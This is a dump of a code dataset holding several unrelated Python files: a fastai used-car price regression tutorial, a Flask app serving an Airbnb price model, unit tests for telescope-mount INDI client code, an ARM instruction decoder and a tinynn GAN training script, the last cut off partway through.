id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
1644811 | import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
arr = np.random.logistic(loc=1, scale=2, size=10)
print(arr)
arr = np.random.logistic(size=1000) # DEFUALT loc=0, scale=1
sns.distplot(arr, hist=False)
plt.show()
| StarcoderdataPython |
3255010 | <filename>A_HANDS-ON_GUIDE_TO_REGRESSION_WITH_FASTAI.py
# -*- coding: utf-8 -*-
"""Published-Regression_Using_Fastai.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/17VOQ78Wwj2ByP98M6ojhqpkq0usp3Udt
#Regression With Fastai
---
Published at Analytics India Magazine -- [A HANDS-ON GUIDE TO REGRESSION WITH FAST.AI](https://analyticsindiamag.com/a-hands-on-guide-to-regression-with-fast-ai/)
**Getting Started With Regression**
Regression With Fast.ai in 7 simple steps:
* Importing the libraries
* Creating a TabularList
* Initialising Neural Network
* Training the model
* Evaluating the model
* A simple analysis on the predictions of the validation set
* Predicting using the network
##Importing All Major Libraries
"""
import pandas as pd
import numpy as np
from fastai.tabular import *
"""**The fastai.tabular package includes all the modules that are necessary for processing tabular data.**
## Importing The Data
"""
#Reading the datasets from excel sheet
training_set = pd.read_excel("Data_Train.xlsx")
test_set = pd.read_excel("Data_Test.xlsx")
"""## Understanding The Data"""
training_set.head(5)
# Checking the number of rows
print("\n\nNumber of observations in the datasets :\n",'#' * 40)
print("\nTraining Set : ",len(training_set))
print("Test Set : ",len(test_set))
# checking the number of features in the Datasets
print("\n\nNumber of features in the datasets :\n",'#' * 40)
print("\nTraining Set : ",len(training_set.columns))
print("Test Set : ",len(test_set.columns))
# checking the features in the Datasets
print("\n\nFeatures in the datasets :\n",'#' * 40)
print("\nTraining Set : ", list(training_set.columns))
print("Test Set : ",list(test_set.columns))
# Checking the data types of features
print("\n\nDatatypes of features in the datasets :\n",'#' * 40)
print("\nTraining Set : ", training_set.dtypes)
print("\nTest Set : ",test_set.dtypes)
# checking for NaNs or empty cells
print("\n\nEmpty cells or Nans in the datasets :\n",'#' * 40)
print("\nTraining Set : ",training_set.isnull().values.any())
print("\nTest Set : ",test_set.isnull().values.any())
# checking for NaNs or empty cells by column
print("\n\nNumber of empty cells or Nans in the datasets :\n",'#' * 40)
print("\nTraining Set : ","\n", training_set.isnull().sum())
print("\nTest Set : ",test_set.isnull().sum())
#Displaying dataset information
print("\n\nInfo:\n",'#' * 40)
training_set.info()
"""### Exploring Categorical features"""
# Non categorical Features in The dataset
training_set.select_dtypes(['int','float']).columns
#Categotical Features in The Dataset
training_set.select_dtypes('object').columns
#The Unique values in each of the categorical features
all_brands = list(training_set.Name) + list(test_set.Name)
all_locations = list(training_set.Location) + list(test_set.Location)
all_fuel_types = list(training_set.Fuel_Type) + list(test_set.Fuel_Type)
all_transmissions = list(training_set.Transmission) + list(test_set.Transmission)
all_owner_types = list(training_set.Owner_Type) + list(test_set.Owner_Type)
print("\nNumber Of Unique Values In Name : \n ", len(set(all_brands)))
#print("\nThe Unique Values In Name : \n ", set(all_brands))
print("\nNumber Of Unique Values In Location : \n ", len(set(all_locations)))
print("\nThe Unique Values In Location : \n ", set(all_locations) )
print("\nNumber Of Unique Values In Fuel_Type : \n ", len(set(all_fuel_types)))
print("\nThe Unique Values In Fuel_Type : \n ", set(all_fuel_types) )
print("\nNumber Of Unique Values In Transmission : \n ", len(set(all_transmissions)))
print("\nThe Unique Values In Transmission : \n ", set(all_transmissions) )
print("\nNumber Of Unique Values In Owner_Type : \n ", len(set(all_owner_types)))
print("\nThe Unique Values In Owner_Type : \n ", set(all_owner_types) )
"""## Feature Generation And Dataset Restructuring"""
#Based on the information gathered from the data, lets simplify and restructure it.
def restructure(data):
names = list(data.Name)
brand = []
model = []
#Splitting The Column 'Name'
for i in range(len(names)):
try:
brand.append(names[i].split(" ")[0])
try:
model.append(" ".join(names[i].split(" ")[1:]).strip())
except:
pass
except:
print("ERR ! - ", names[i], "@" , i)
#Cleaning Mileage Column
mileage = list(data.Mileage)
for i in range(len(mileage)):
try :
mileage[i] = float(mileage[i].split(" ")[0].strip())
except:
mileage[i] = np.nan
#Cleaning Engine Column
engine = list(data.Engine)
for i in range(len(engine)):
try :
engine[i] = int(engine[i].split(" ")[0].strip())
except:
engine[i] = np.nan
#Cleaning Power Columns
power = list(data.Power)
for i in range(len(power)):
try :
power[i] = float(power[i].split(" ")[0].strip())
except:
power[i] = np.nan
#Cleaning New_Price
data['New_Price'].fillna(0, inplace = True)
newp = list(data['New_Price'])
for i in range(len(newp)):
if newp[i] == 0:
newp[i] = float(newp[i])
continue
elif 'Cr' in newp[i]:
newp[i] = float(newp[i].split()[0].strip()) * 100
elif 'Lakh' in newp[i]:
newp[i] = float(newp[i].split()[0].strip())
#Re-ordering the columns
restructured = pd.DataFrame({'Brand': brand,
'Model':model,
'Location': data['Location'],
'Year':data['Year'] ,
'Kilometers_Driven':data['Kilometers_Driven'],
'Fuel_Type':data['Fuel_Type'],
'Transmission':data['Transmission'],
'Owner_Type':data['Owner_Type'],
'Mileage':mileage,
'Engine':engine,
'Power':power,
'Seats':data['Seats'],
'New_Price':newp
})
#If the dataset passed is training set include the Price column
if 'Price' in data.columns:
restructured['Price'] = data['Price']
return restructured
else:
return restructured
"""**Summary:**
The data is is restructured in the following ways:
1. The Name column in the original dataset is split in to two features, Brand and Model.
1. The Mileage column is cleaned to have float values.
1. The Engine column is cleaned to have integer values.
2. The Power column is cleaned to have integer values.
2. The New_Price column is cleaned to remove nulls and correct the units.
"""
#Restructuring Training and Test sets
train_data = restructure(training_set)
test_data = restructure(test_set)
#the dimensions of the training set
train_data.shape
#the dimensions of the test set
test_data.shape
#Top 5 rows of the training set
train_data.head(5)
#Top 5 rows of the test set
test_data.head()
"""## Regression With Fast.ai
###Creating A TabularList
TabularList in fastai is the basic ItemList for any kind of tabular data.It is a class to create a list of inputs in items for tabular data.
Main Arguments:
cat_names : The categorical features in the data.
cont_names : The continuous features in the data.
procs : A liat of transformations to be applies to the data such as FillMissing, Categorify, Normalize etc.
"""
#Defining the keyword arguments for fastai's TabularList
#Path / default location for saving/loading models
path = ''
#The dependent variable/target
dep_var = 'Price'
#The list of categorical features in the dataset
cat_names = ['Brand', 'Model', 'Location', 'Fuel_Type', 'Transmission', 'Owner_Type']
#The list of continuous features in the dataset
#Exclude the Dependent variable 'Price'
cont_names =['Year', 'Kilometers_Driven', 'Mileage', 'Engine', 'Power', 'Seats', 'New_Price']
#List of Processes/transforms to be applied to the dataset
procs = [FillMissing, Categorify, Normalize]
#Start index for creating a validation set from train_data
start_indx = len(train_data) - int(len(train_data) * 0.2)
#End index for creating a validation set from train_data
end_indx = len(train_data)
#TabularList for Validation
val = (TabularList.from_df(train_data.iloc[start_indx:end_indx].copy(), path=path, cat_names=cat_names, cont_names=cont_names))
test = (TabularList.from_df(test_data, path=path, cat_names=cat_names, cont_names=cont_names, procs=procs))
#TabularList for training
data = (TabularList.from_df(train_data, path=path, cat_names=cat_names, cont_names=cont_names, procs=procs)
.split_by_idx(list(range(start_indx,end_indx)))
.label_from_df(cols=dep_var)
.add_test(test)
.databunch())
"""**Summary:**
1. Initializing/Setting The parameters for TabularList such as path, dep_var, cat_names, cont_names and procs.
1. Setting the index for Validation set. The start index and End index are set in such a away that it takes the last 20% data from the training set for validation.
2. Creating TabularList for Validation set from train_data.
2. Creating TabularList for Test set from test_data.
1. Creating a DataBunch for the network.DataBunch is a class that binds train_dl,valid_dl and test_dl in a data object.
"""
#Display the data batch
data.show_batch(rows = 10)
"""###Initializing Neural Network"""
#Initializing the network
learn = tabular_learner(data, layers=[300,200, 100, 50], metrics= [rmse,r2_score])
"""The above line of code will initialize a neural network with 4 layers and the number of nodes in each layer as 300,200, 100 and 50 respectively.
The network will use two primary metrics for evaluation:
* Root Mean Squared Error(RMSE)
* R-Squared
"""
#Show the complete Summary of the model
learn.summary
"""###Training The Network"""
learn.lr_find(start_lr = 1e-05,end_lr = 1e+05, num_it = 100)
learn.recorder.plot()
"""Learning rate is a hyper-parameter that controls how much the weights of the network is being adjusted with respect the loss gradient.
The lr_find method helps explore the learning rate in a specified range. The graph shows the deviation in loss with respect to the learning rate.
"""
#Fitting data and training the network
learn.fit_one_cycle(25)
"""**The above line trains the network for 25 epochs.**
### Evaluating Performance
"""
#Display Predictions On Training Data
learn.show_results(ds_type=DatasetType.Train,rows = 5)
#Display Predictions On Validation Data
learn.show_results(ds_type=DatasetType.Valid)
#Getting The Training And Validation Errors
tr = learn.validate(learn.data.train_dl)
va = learn.validate(learn.data.valid_dl)
print("The Metrics used In Evaluating The Network:", str(learn.metrics))
print("\nThe calculated RMSE & R-Squared For The Training Set :", tr[1:])
print("\nThe calculated RMSE & R-Squared For The Validation Set :", va[1:])
"""Summary:
The Root Mean Squared Error is the standard deviation of the errors/residuals. It tells us the 'Goodness Of Fit' of a model. The lower the value of RMSE the better the model.
The R-Squared metric also called the coefficient of determination is used to understand the variation in the dependent variable(y) and the independent variable(X).The closer the value of R-Squared is to one, the better the model.
**The above output suggests that:**
**The model/network was able to attain an RMSE of 1.4678 and an R_squared of 0.9726 while training and an RMSE of 3.1737 and an R_squared of 0.9107 while Validating on the validation set.**
"""
#Plotting The losses for training and validation
learn.recorder.plot_losses()
"""The above graph shows the change is loss during the course of training the network. At the beginning of the training we can see a high loss value. As the networks learned from the data, the loss started to drop until it could no longer improve during the course of training.
The validation shows a relatively consistent and low loss values.
**Note :**
The validation losses are only calculated once per epoch, whereas training losses are calculated after
"""
#Plotting Momentum & Learning Rate
learn.recorder.plot_lr(show_moms=True)
"""The above plots learning rate and momentum during the course of training."""
#Plotting the metrics of evaluation
learn.recorder.plot_metrics()
"""The decreasing RMSE and increasing R-Squared depicts the Goodness Of Fit.
### Exploring Validation Predictions
"""
val = train_data.tail(1203)
#Converting the prediction to DataFrame for Comparing
val_preds = learn.get_preds(ds_type=DatasetType.Valid)[0]
val_preds = [i[0] for i in val_preds.tolist()]
val['Predicted'] = val_preds
val.head()
"""#### Calculating RMLSE For Validation Predictions
Since the metric used in the hackathon for evaluating the predictions is RMSLE , we will calculate te same for the validation predictions to evaluate our model.
"""
import numpy as np
Y_true = val['Price']
pred = val['Predicted']
#RMSLE
error = np.square(np.log10(pred + 1) - np.log10(Y_true +1)).mean() ** 0.5
score = 1 - error
print("SCORE For Validation : ",score)
"""#### A Simple Analysis On Predictions"""
#Plotting The Average Price For A Given Car Brand, -- Actual vs Predicted
import matplotlib.pyplot as plt
plt.figure(figsize=(30, 3))
plt.plot(val.groupby(['Brand']).mean()['Price'], linewidth = 3, )
plt.plot(val.groupby(['Brand']).mean()['Predicted'],linewidth = 5, ls = '--')
plt.title('Average Price By Brands')
plt.xlabel('Brands')
plt.ylabel('Price In Lacs')
plt.legend()
plt.show()
"""The above graph shows comparison of the the average actual price by Brand and the predicted price."""
print("R-Squared For Validation Set : ", r2_score(learn.get_preds(ds_type=DatasetType.Valid)[0], learn.get_preds(ds_type=DatasetType.Valid)[1]))
print("\nRMSE For Validation Set : ",root_mean_squared_error(learn.get_preds(ds_type=DatasetType.Valid)[0], learn.get_preds(ds_type=DatasetType.Valid)[1]))
"""###Predicting For Test Data
####Predicting For A Single Row OF Test Set
"""
#Test set data for row 0
test_data.iloc[0]
#Prediction in float for Test set data for row 0
float(learn.predict(test_data.iloc[0])[1])
"""####Predicting For Test Set"""
test_predictions = learn.get_preds(ds_type=DatasetType.Test)[0]
#Converting the tensor output to a list of predicted values
test_predictions = [i[0] for i in test_predictions.tolist()]
#Converting the prediction to . a dataframe
test_predictions = pd.DataFrame(test_predictions, columns = ['Price'])
#Writing the predictions to an excel file.
predictions.to_excel("Fast_ai_solution.xlsx", index = False)
"""**Submit the above file [here](https://www.machinehack.com/course/predicting-the-costs-of-used-cars-hackathon-by-imarticus/leaderboard) to find out your score. Good Luck!**""" | StarcoderdataPython |
4835042 | <gh_stars>0
from flask import Flask, render_template, request
import pickle
import numpy as np
app=Flask(__name__)
loaded_model = pickle.load(open("nycairbnbmodel.pkl","rb"))
@app.route('/')
def home():
return render_template('home.html')
def ValuePredictor(to_predict_list):
to_predict = np.array(to_predict_list).reshape(1,49)
result = loaded_model.predict(to_predict)
result = np.e** result[0] -1
return '$'+str(round(result,2))
@app.route('/result', methods=['GET', 'POST'])
def result():
if request.method == 'POST':
to_predict_dict = request.form.to_dict()
#print(to_predict_dict.values())
to_predict_list= list(to_predict_dict.values())
print(to_predict_dict)
# Neighbourhood
neighbourhood = ['Bedford-Stuyvesant', 'Bushwick', 'Chelsea', 'Clinton Hill','Crown Heights',
'East Flatbush', 'East Harlem', 'East Village', 'Financial District', 'Flatbush', 'Flushing',
'Fort Greene', 'Greenpoint', 'Harlem', "Hell's Kitchen", 'Kips Bay', 'Long Island City',
'Lower East Side', 'Midtown', 'Murray Hill', 'Park Slope', 'Prospect-Lefferts Gardens',
'Ridgewood', 'Sunset Park', 'Upper East Side', 'Upper West Side', 'Washington Heights',
'West Village', 'Williamsburg', 'other']
neighbourhood_list = [1 if i == to_predict_dict['neighbourhood'] else 0 for i in neighbourhood]
# Neighbourhood Groups
neighbourhood_group = ['Bronx','Brooklyn', 'Manhatten', 'Queens', 'Staten Island']
neighbourhood_group_list = [1 if i == to_predict_dict['neighbourhood_group'] else 0 for i in neighbourhood_group]
# Room Types
room_type = ['Entire Home/Apartment','Private Room', 'Shared Room']
room_type_list = [1 if i == to_predict_dict['room_type'] else 0 for i in room_type]
# For all numerical values
to_predict_list1 = neighbourhood_list + neighbourhood_group_list + room_type_list + to_predict_list[3:11]
to_predict_list1 = list(map(float, to_predict_list1))
# For Boolean Values
to_predict_list2 = [True if i == 'Yes' else False for i in to_predict_list[-3:]]
# Merge the 2 list
to_predict_list_final = to_predict_list1 + to_predict_list2
print("Before sending to model", to_predict_list_final)
print(loaded_model)
result = ValuePredictor(to_predict_list_final)
print("result from model", result)
return render_template("result.html",result=result)
if __name__ == "__main__":
app.run(debug=True)
| StarcoderdataPython |
3394432 | """Tests for the lander.ext.parser.pandoc module's format conversion
functionality.
"""
from __future__ import annotations
from lander.ext.parser.pandoc import convert_text
def test_convert() -> None:
source = r"Hello \emph{world}"
expected = "Hello world\n"
assert expected == convert_text(
content=source, source_fmt="latex", output_fmt="plain"
)
| StarcoderdataPython |
3260538 | <gh_stars>10-100
############################################################
# -*- coding: utf-8 -*-
#
# # # # # # #
# ## ## # ## # #
# # # # # # # # # # #
# # ## # ## ## ######
# # # # # # #
#
# Python-based Tool for interaction with the 10micron mounts
# GUI with PyQT5 for python
#
# written in python3, (c) 2019-2021 by mworion
# Licence APL2.0
#
###########################################################
# standard libraries
from unittest import mock
# external packages
import pytest
import PyQt5
from PyQt5.QtTest import QTest
from indibase.indiBase import Device
from base.indiClass import IndiClass
# local import
from base import indiClass
from base.driverDataClass import Signals
host_ip = 'astro-mount.fritz.box'
class Signal(PyQt5.QtCore.QObject):
message = PyQt5.QtCore.pyqtSignal(str, int)
class TestSignals(IndiClass):
signals = Signals()
def __init__(self, app=None, data=None, threadPool=None):
super().__init__(app=app, data=data, threadPool=threadPool)
@pytest.fixture(autouse=True, scope='function')
def module_setup_teardown():
global app
m = Signal()
with mock.patch.object(PyQt5.QtCore.QTimer,
'start'):
app = TestSignals(m)
yield
def test_class_without_app():
a = indiClass.IndiClass()
def test_properties():
app.deviceName = 'test'
assert app.deviceName == 'test'
app.host = ('localhost', 7624)
assert app.host == ('localhost', 7624)
app.hostaddress = 'localhost'
assert app.hostaddress == 'localhost'
app.port = 7624
assert app.port == 7624
def test_serverConnected_1():
app.deviceName = ''
suc = app.serverConnected()
assert not suc
def test_serverConnected_2():
app.deviceName = 'test'
with mock.patch.object(app.client,
'watchDevice',
return_value=True) as call:
suc = app.serverConnected()
assert suc
call.assert_called_with('test')
def test_serverDisconnected():
suc = app.serverDisconnected({'test': 'test'})
assert suc
def test_newDevice_1():
app.deviceName = 'false'
with mock.patch.object(app.client,
'getDevice',
return_value=None):
suc = app.newDevice('test')
assert suc
assert None is app.device
def test_newDevice_2():
app.deviceName = 'test'
with mock.patch.object(app.client,
'getDevice',
return_value=Device()):
suc = app.newDevice('test')
assert suc
assert app.device is not None
def test_removeDevice_1():
app.deviceName = 'test'
app.device = Device()
app.data = {'test': 1}
suc = app.removeDevice('foo')
assert not suc
def test_removeDevice_2():
app.deviceName = 'test'
app.device = Device()
app.data = {'test': 1}
suc = app.removeDevice('test')
assert suc
assert app.data == {}
assert app.device is None
def test_startRetry_1():
app.deviceName = ''
suc = app.startRetry()
assert not suc
def test_startRetry_2():
app.deviceName = 'test'
app.device = Device()
app.data = {}
suc = app.startRetry()
assert not suc
def test_startRetry_3():
app.deviceConnected = False
app.deviceName = 'test'
app.device = Device()
app.data = {}
with mock.patch.object(app.client,
'connectServer',
return_value=True):
suc = app.startRetry()
assert suc
assert not app.deviceConnected
def test_startRetry_4():
app.deviceConnected = False
app.deviceName = 'test'
app.device = Device()
app.data = {'test': 1}
with mock.patch.object(app.client,
'connectServer',
return_value=False):
suc = app.startRetry()
assert suc
assert app.deviceConnected
def test_startCommunication_1():
app.data = {}
with mock.patch.object(app.client,
'startTimers',
return_value=False):
with mock.patch.object(app.client,
'connectServer',
return_value=False):
with mock.patch.object(app.timerRetry,
'start'):
suc = app.startCommunication()
assert not suc
def test_startCommunication_2():
app.data = {}
with mock.patch.object(app.client,
'startTimers',
return_value=False):
with mock.patch.object(app.client,
'connectServer',
return_value=True):
with mock.patch.object(app.timerRetry,
'start'):
suc = app.startCommunication()
assert suc
def test_stopCommunication_1():
with mock.patch.object(app.client,
'stopTimers',
return_value=False):
with mock.patch.object(app.client,
'disconnectServer',
return_value=False):
suc = app.stopCommunication()
assert not suc
def test_stopCommunication_2():
with mock.patch.object(app.client,
'stopTimers',
return_value=False):
with mock.patch.object(app.client,
'disconnectServer',
return_value=True):
suc = app.stopCommunication()
assert suc
def test_connectDevice1():
with mock.patch.object(app.client,
'connectDevice',
return_value=False):
suc = app.connectDevice('test', 'test')
assert not suc
def test_connectDevice2():
with mock.patch.object(app.client,
'connectDevice',
return_value=False):
suc = app.connectDevice('test', 'CONNECTION')
assert not suc
def test_connectDevice3():
app.deviceName = 'test'
with mock.patch.object(app.client,
'connectDevice',
return_value=True):
suc = app.connectDevice('test', 'CONNECTION')
assert suc
def test_connectDevice4():
app.deviceName = 'test'
with mock.patch.object(app.client,
'connectDevice',
return_value=False):
suc = app.connectDevice('test', 'CONNECTION')
assert not suc
def test_loadDefaultConfig_1():
app.loadIndiConfig = False
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'test': 1}):
suc = app.loadConfig('test')
assert not suc
def test_loadDefaultConfig_2():
app.loadIndiConfig = True
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'test': 1}):
with mock.patch.object(app.client,
'sendNewSwitch',
return_value=False):
suc = app.loadConfig('test')
assert not suc
def test_loadDefaultConfig_3():
app.loadIndiConfig = True
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'test': 1}):
with mock.patch.object(app.client,
'sendNewSwitch',
return_value=True):
suc = app.loadConfig('test')
assert suc
def test_setUpdateConfig():
app.setUpdateConfig('test')
def test_convertIndigoProperty_1():
app.INDIGO = {'test': 'test1'}
val = app.convertIndigoProperty('test')
assert val == 'test1'
def test_updateNumber_1():
suc = app.updateNumber('telescope', 'test')
assert not suc
def test_updateNumber_2():
app.device = Device()
suc = app.updateNumber('telescope', 'test')
assert not suc
def test_updateNumber_3():
app.data = {}
app.device = Device()
app.deviceName = 'telescope'
with mock.patch.object(app.device,
'getNumber',
return_value={'test': 1}):
suc = app.updateNumber('telescope', 'test')
assert suc
def test_updateText_1():
suc = app.updateText('telescope', 'test')
assert not suc
def test_updateText_2():
app.device = Device()
suc = app.updateText('telescope', 'test')
assert not suc
def test_updateText_3():
app.data = {}
app.device = Device()
app.deviceName = 'telescope'
with mock.patch.object(app.device,
'getText',
return_value={'test': 1}):
suc = app.updateText('telescope', 'test')
assert suc
def test_updateSwitch_1():
suc = app.updateSwitch('telescope', 'test')
assert not suc
def test_updateSwitch_2():
app.device = Device()
suc = app.updateSwitch('telescope', 'test')
assert not suc
def test_updateSwitch_3():
app.data = {}
app.device = Device()
app.deviceName = 'telescope'
with mock.patch.object(app.device,
'getSwitch',
return_value={'test': 1}):
suc = app.updateSwitch('telescope', 'test')
assert suc
def test_updateSwitch_4():
app.data = {}
app.device = Device()
app.deviceName = 'telescope'
with mock.patch.object(app.device,
'getSwitch',
return_value={'test': 1}):
suc = app.updateSwitch('telescope', 'PROFILE')
assert suc
def test_updateLight_1():
suc = app.updateLight('telescope', 'test')
assert not suc
def test_updateLight_2():
app.device = Device()
suc = app.updateLight('telescope', 'test')
assert not suc
def test_updateLight_3():
app.data = {}
app.device = Device()
app.deviceName = 'telescope'
with mock.patch.object(app.device,
'getLight',
return_value={'test': 1}):
suc = app.updateLight('telescope', 'test')
assert suc
def test_updateBLOB_1():
suc = app.updateBLOB('telescope', 'test')
assert not suc
def test_updateBLOB_2():
app.device = Device()
suc = app.updateBLOB('telescope', 'test')
assert not suc
def test_updateBLOB_3():
app.device = Device()
app.deviceName = 'telescope'
suc = app.updateBLOB('telescope', 'test')
assert suc
def test_removePrefix_1():
value = app.removePrefix('', '')
assert value == ''
def test_removePrefix_2():
value = app.removePrefix('NOT should not be shown', 'NOT')
assert value == 'should not be shown'
def test_updateMessage_1():
app.showMessages = False
suc = app.updateMessage('test', 'text')
assert not suc
def test_updateMessage_2():
app.showMessages = True
suc = app.updateMessage('test', 'text')
assert suc
def test_updateMessage_3():
app.showMessages = True
suc = app.updateMessage('test', '[WARNING] should not be shown')
assert suc
def test_updateMessage_4():
app.showMessages = True
suc = app.updateMessage('test', '[ERROR] should not be shown')
assert suc
def test_updateMessage_5():
app.showMessages = True
suc = app.updateMessage('test', 'NOT should not be shown')
assert suc
def test_addDiscoveredDevice_1(qtbot):
device = Device()
app.indiClass = IndiClass()
with mock.patch.object(device,
'getText',
return_value={'DRIVER_INTERFACE': None}):
suc = app.addDiscoveredDevice('telescope', 'test')
assert not suc
def test_addDiscoveredDevice_2(qtbot):
app.indiClass = IndiClass()
app.indiClass.client.devices['telescope'] = {}
suc = app.addDiscoveredDevice('telescope', 'DRIVER_INFO')
assert not suc
def test_addDiscoveredDevice_3(qtbot):
device = Device()
app.indiClass = IndiClass()
app.client.devices['telescope'] = device
app.discoverType = None
with mock.patch.object(device,
'getText',
return_value={}):
suc = app.addDiscoveredDevice('telescope', 'DRIVER_INFO')
assert not suc
def test_addDiscoveredDevice_4(qtbot):
device = Device()
app.indiClass = IndiClass()
app.client.devices['telescope'] = device
app.discoverType = None
app.discoverList = list()
with mock.patch.object(device,
'getText',
return_value={'DRIVER_INTERFACE': '0'}):
suc = app.addDiscoveredDevice('telescope', 'DRIVER_INFO')
assert not suc
def test_addDiscoveredDevice_5(qtbot):
device = Device()
app.indiClass = IndiClass()
app.client.devices['telescope'] = device
app.discoverType = 1
app.discoverList = list()
with mock.patch.object(device,
'getText',
return_value={'DRIVER_INTERFACE': 1}):
suc = app.addDiscoveredDevice('telescope', 'DRIVER_INFO')
assert suc
def test_discoverDevices_1():
with mock.patch.object(QTest,
'qWait'):
val = app.discoverDevices('dome')
assert val == []
| StarcoderdataPython |
3304768 | from and_register_shifted_register_a1 import AndRegisterShiftedRegisterA1
from eor_register_shifted_register_a1 import EorRegisterShiftedRegisterA1
from sub_register_shifted_register_a1 import SubRegisterShiftedRegisterA1
from rsb_register_shifted_register_a1 import RsbRegisterShiftedRegisterA1
from add_register_shifted_register_a1 import AddRegisterShiftedRegisterA1
from adc_register_shifted_register_a1 import AdcRegisterShiftedRegisterA1
from sbc_register_shifted_register_a1 import SbcRegisterShiftedRegisterA1
from rsc_register_shifted_register_a1 import RscRegisterShiftedRegisterA1
from tst_register_shifted_register_a1 import TstRegisterShiftedRegisterA1
from teq_register_shifted_register_a1 import TeqRegisterShiftedRegisterA1
from cmp_register_shifted_register_a1 import CmpRegisterShiftedRegisterA1
from cmn_register_shifted_register_a1 import CmnRegisterShiftedRegisterA1
from orr_register_shifted_register_a1 import OrrRegisterShiftedRegisterA1
from lsl_register_a1 import LslRegisterA1
from lsr_register_a1 import LsrRegisterA1
from asr_register_a1 import AsrRegisterA1
from ror_register_a1 import RorRegisterA1
from bic_register_shifted_register_a1 import BicRegisterShiftedRegisterA1
from mvn_register_shifted_register_a1 import MvnRegisterShiftedRegisterA1
def decode_instruction(instr):
if instr[7:11] == "0b0000":
# Bitwise AND
return AndRegisterShiftedRegisterA1
elif instr[7:11] == "0b0001":
# Bitwise Exclusive OR
return EorRegisterShiftedRegisterA1
elif instr[7:11] == "0b0010":
# Subtract
return SubRegisterShiftedRegisterA1
elif instr[7:11] == "0b0011":
# Reverse Subtract
return RsbRegisterShiftedRegisterA1
elif instr[7:11] == "0b0100":
# Add
return AddRegisterShiftedRegisterA1
elif instr[7:11] == "0b0101":
# Add with Carry
return AdcRegisterShiftedRegisterA1
elif instr[7:11] == "0b0110":
# Subtract with Carry
return SbcRegisterShiftedRegisterA1
elif instr[7:11] == "0b0111":
# Reverse Subtract with Carry
return RscRegisterShiftedRegisterA1
elif instr[7:12] == "0b10001":
# Test
return TstRegisterShiftedRegisterA1
elif instr[7:12] == "0b10011":
# Test Equivalence
return TeqRegisterShiftedRegisterA1
elif instr[7:12] == "0b10101":
# Compare
return CmpRegisterShiftedRegisterA1
elif instr[7:12] == "0b10111":
# Compare Negative
return CmnRegisterShiftedRegisterA1
elif instr[7:11] == "0b1100":
# Bitwise OR
return OrrRegisterShiftedRegisterA1
elif instr[7:11] == "0b1101" and instr[25:27] == "0b00":
# Logical Shift Left
return LslRegisterA1
elif instr[7:11] == "0b1101" and instr[25:27] == "0b01":
# Logical Shift Right
return LsrRegisterA1
elif instr[7:11] == "0b1101" and instr[25:27] == "0b10":
# Arithmetic Shift Right
return AsrRegisterA1
elif instr[7:11] == "0b1101" and instr[25:27] == "0b11":
# Rotate Right
return RorRegisterA1
elif instr[7:11] == "0b1110":
# Bitwise Bit Clear
return BicRegisterShiftedRegisterA1
elif instr[7:11] == "0b1111":
# Bitwise NOT
return MvnRegisterShiftedRegisterA1
| StarcoderdataPython |
136131 | <reponame>lx120/tinynn<gh_stars>0
"""tinynn implementation of Deep Convolution Generative Adversarial Network."""
import argparse
import os
import matplotlib.pyplot as plt
import numpy as np
import tinynn as tn
from nets import D_cnn, D_mlp, G_cnn, G_mlp
def get_noise(size):
return np.random.normal(size=size)
def train(args):
# prepare dataset
mnist = tn.dataset.MNIST(args.data_dir)
X = np.vstack([mnist.train_set[0], mnist.valid_set[0], mnist.test_set[0]])
y = np.vstack([mnist.train_set[1], mnist.valid_set[1], mnist.test_set[1]])
if args.model_type == "cnn":
X = X.reshape((-1, 28, 28, 1))
G_net, D_net = G_cnn(), D_cnn()
elif args.model_type == "mlp":
G_net, D_net = G_mlp(), D_mlp()
else:
raise ValueError("Invalid argument: model_type")
fix_noise = get_noise(size=(args.batch_size, args.nz))
loss = tn.loss.SigmoidCrossEntropy()
G = tn.model.Model(net=G_net, loss=loss,
optimizer=tn.optimizer.Adam(args.lr_g, beta1=args.beta1))
D = tn.model.Model(net=D_net, loss=loss,
optimizer=tn.optimizer.Adam(args.lr_d, beta1=args.beta1))
running_g_err, running_d_err = 0, 0
iterator = tn.data_iterator.BatchIterator(batch_size=args.batch_size)
for epoch in range(args.num_ep):
for i, batch in enumerate(iterator(X, y)):
# --- Train Discriminator ---
# feed with real data (maximize log(D(x)))
d_pred_real = D.forward(batch.inputs)
label_real = np.ones_like(d_pred_real)
d_real_err, d_real_grad = D.backward(
d_pred_real, label_real)
# feed with fake data (maximize log(1 - D(G(z))))
noise = get_noise(size=(len(batch.inputs), args.nz))
g_out = G.forward(noise)
d_pred_fake = D.forward(g_out)
label_fake = np.zeros_like(d_pred_fake)
d_fake_err, d_fake_grad = D.backward(
d_pred_fake, label_fake)
# train D
d_err = d_real_err + d_fake_err
d_grads = d_real_grad + d_fake_grad
D.apply_grads(d_grads)
# ---- Train Generator ---
# maximize log(D(G(z)))
d_pred_fake = D.forward(g_out)
g_err, d_grad = D.backward(d_pred_fake, label_real)
g_grads = G.net.backward(d_grad.wrt_input)
G.apply_grads(g_grads)
running_d_err = 0.9 * running_d_err + 0.1 * d_err
running_g_err = 0.9 * running_g_err + 0.1 * g_err
if i % 100 == 0:
print(f"epoch: {epoch + 1}/{args.num_ep} iter-{i + 1}"
f"d_err: {running_d_err:.4f} g_err: {running_g_err:.4f}")
# sampling
print(f"epoch: {epoch + 1}/{args.num_ep}"
f"d_err: {running_d_err:.4f} g_err: {running_g_err:.4f}")
samples = G.forward(fix_noise)
img_name = "ep%d.png" % (epoch + 1)
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
save_path = os.path.join(args.output_dir, img_name)
save_batch_as_images(save_path, samples)
# save generator
model_path = os.path.join(args.output_dir, args.model_name)
G.save(model_path)
print(f"Saving generator {model_path}")
def evaluate(args):
G = tn.model.Model(net=G_mlp(), loss=None, optimizer=None)
model_path = os.path.join(args.output_dir, args.model_name)
print(f"Loading model from {model_path}")
G.load(model_path)
noise = get_noise(size=(128, args.nz))
samples = G.forward(noise)
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
save_path = os.path.join(args.output_dir, "evaluate.png")
save_batch_as_images(save_path, samples)
def save_batch_as_images(path, batch, titles=None):
m = batch.shape[0] # batch size
batch_copy = batch[:]
batch_copy.resize(m, 28, 28)
fig, ax = plt.subplots(int(m / 16), 16, figsize=(28, 28))
